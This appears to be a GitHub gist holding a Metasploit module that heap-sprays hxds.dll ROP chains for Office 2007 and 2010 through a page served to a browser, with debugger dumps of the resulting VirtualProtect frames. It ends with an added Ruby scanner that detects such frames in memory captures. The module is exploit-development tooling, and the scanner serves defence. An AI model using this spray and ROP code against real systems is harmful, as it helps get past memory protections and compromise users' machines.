@wchen-r7
Created October 1, 2013 06:37
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ROP test",
      'Description'    => %q{
        ROP test for Office 2007 and Office 2010
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
      'References'     => [ [ 'URL', 'http://metasploit.com' ] ],
      'Platform'       => 'win',
      'Targets'        => [ [ 'Automatic', {} ] ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 1 2013",
      'DefaultTarget'  => 0))
  end

  # Build the hxds ROP chains for both Office versions from the RopDb mixin.
  # The "payload" is a 100-byte NOP sled, so this test only checks chain placement.
  def generate_hxds_chains
    p = "\x90" * 100
    {
      :office_2007 => generate_rop_payload('hxds', p, { 'target'=>'2007' }),
      :office_2010 => generate_rop_payload('hxds', p, { 'target'=>'2010' })
    }
  end

  def on_request_uri(cli, request)
    rops = generate_hxds_chains
    # Both chains are concatenated into one buffer that the property spray places in memory
    layout = rops[:office_2007] + rops[:office_2010]
    print_line
    print_line("\n" + Rex::Text.to_hex_dump(layout))
    js_layout = Rex::Text.to_unescape(layout)
    html = %Q|
    <html>
    <script>
    #{js_property_spray}
    function loadOffice() {
      // The ms-help: handler loads the Office help component (hxds.dll) into the browser
      try{location.href='ms-help://'} catch(e){}
    }
    window.onload = function() {
      loadOffice();
      // Target address for Office 2007 = 0x20302020
      // Target address for Office 2010 = 0x203020DC
      var s = unescape("#{js_layout}");
      sprayHeap({shellcode:s});
      alert("Ready. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.");
    }
    </script>
    </html>
    |
    print_status("ROPs sent. Check address 0x20302020 for Office 2007. 0x203020DC for Office 2010.")
    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
  end
end

=begin
VirtualProtect for office 2007 rop chain:
20302044 FFFFFFFF ÿÿÿÿ |hProcess = FFFFFFFF
20302048 20302074 t 0  |Address = 20302074
2030204C 00000201 ..   |Size = 201 (513.)
20302050 00000040 @... |NewProtect = PAGE_EXECUTE_READWRITE

VirtualProtect for office 2010 rop chain:
20302108 FFFFFFFF ÿÿÿÿ |hProcess = FFFFFFFF
2030210C 20302138 8!0  |Address = 20302138
20302110 00000201 ..   |Size = 201 (513.)
20302114 00000040 @... |NewProtect = PAGE_EXECUTE_READWRITE
20302118 51C5C638 8ÆÅQ \pOldProtect = hxds.51C5C638
=end
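The debugger dump in the comment block shows the shape a ROP-built VirtualProtect call frame takes once the chain has landed: hProcess = -1, an address inside the sprayed region, a small size and NewProtect = PAGE_EXECUTE_READWRITE (0x40). That argument pattern is what memory-forensics and exploit-mitigation tooling looks for when checking whether a sprayed heap contains a ready-to-run chain. The Ruby below is an added example, not part of the gist or of the Metasploit framework: it scans a captured byte buffer for that frame layout and reports each hit with its virtual address. The buffer, its base address (assumed 0x20302000) and the frame offset are constructed to mirror the Office 2007 dump above; the size ceiling of 0x10000 is an assumed heuristic, not a value from the page.

```ruby
# Added example: detect VirtualProtect-style argument frames in a memory dump.
# Assumes 32-bit little-endian layout, as in the debugger dump above.
PAGE_EXECUTE_READWRITE = 0x40
PSEUDO_HANDLE_CURRENT_PROCESS = 0xFFFFFFFF   # what -1 / hProcess = FFFFFFFF decodes to
MAX_PLAUSIBLE_SIZE = 0x10000                 # assumed heuristic cap for the Size argument

# Scan +buf+ (a binary String) on 4-byte boundaries for the four-DWORD frame
#   hProcess, Address, Size, NewProtect
# and return one Hash per candidate, with +base+ added so offsets read as VAs.
def find_virtualprotect_frames(buf, base = 0)
  frames = []
  return frames if buf.bytesize < 16
  0.step(buf.bytesize - 16, 4) do |off|
    hprocess, addr, size, prot = buf.byteslice(off, 16).unpack('V4')
    next unless hprocess == PSEUDO_HANDLE_CURRENT_PROCESS
    next unless prot == PAGE_EXECUTE_READWRITE
    next unless size > 0 && size <= MAX_PLAUSIBLE_SIZE
    frames << {
      offset:      base + off,
      address:     addr,
      size:        size,
      new_protect: prot
    }
  end
  frames
end

# Constructed sample buffer: NOP filler around the frame from the Office 2007
# dump (hProcess FFFFFFFF, Address 20302074, Size 201, NewProtect 40) placed
# at offset 0x44, so that base 0x20302000 + 0x44 reproduces VA 0x20302044.
def sample_buffer
  buf = ("\x90".b * 0x44)
  buf << [0xFFFFFFFF, 0x20302074, 0x201, 0x40].pack('V4')
  buf << ("\x90".b * 0x30)
  buf
end

if __FILE__ == $0
  find_virtualprotect_frames(sample_buffer, 0x20302000).each do |f|
    printf("frame at %08X: Address=%08X Size=%X NewProtect=%02X\n",
           f[:offset], f[:address], f[:size], f[:new_protect])
  end
end
```

The scan walks on 4-byte alignment because the frame sits on a stack-aligned pivot in the dump; a capture from an unaligned source would need step 1 at the cost of more false positives. A buffer of pure filler (the NOP sled the module sprays) produces no hits, which is the negative case worth keeping in a test.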